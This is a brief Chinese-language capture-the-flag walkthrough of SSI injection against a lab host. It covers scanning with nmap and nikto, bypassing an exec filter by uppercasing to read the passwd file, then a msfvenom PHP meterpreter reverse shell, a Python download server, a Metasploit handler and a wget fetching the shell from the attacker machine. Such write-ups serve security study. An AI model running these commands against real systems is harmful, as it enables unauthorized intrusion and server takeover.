【CTF】SSI注入实战


kali:192.168.223.131
target:192.168.223.170

通过arp-scan -l获取目标IP为192.168.223.170,nmap扫描一下,发现只开启了80端口

nmap -p- -A 192.168.223.170

是一个模拟的黑客网站,使用nikto扫描

nikto -h http://192.168.223.170

扫描到spukcab的目录,进入后发现里面有index.bak和oldconfig.bak的备份文件,下载下来

通过网页源码发现是POST提交,抓个包,都没有什么特别的东西,但是发现是shtml,可能存在SSI注入漏洞

在提交的两个位置注入一句话


exec反馈回来了,说明存在过滤,改成大写


正确执行并将系统passwd反馈回来,说明存在SSI漏洞

之后生成木马,设置下载服务器,开启监听,目标上线一气呵成,拿到服务器权限

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.131 lport=4444 -f raw > shell.php
python -m SimpleHTTPServer 8000

msfconsole 
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.223.131
exploit

wget http://192.168.223.131/shell.php


http://192.168.223.170/shell.php

SSI

SSI 注入全称Server-Side Includes Injection,即服务端包含注入,允许远程在 Web 应用中注入脚本来执行代码

一般在shtml、stm、shtm或者一些存在XSS漏洞的页面都可能存在SSI

   //需要大写,类似都行
   //将内容加入文档
      //后面跟命令

相关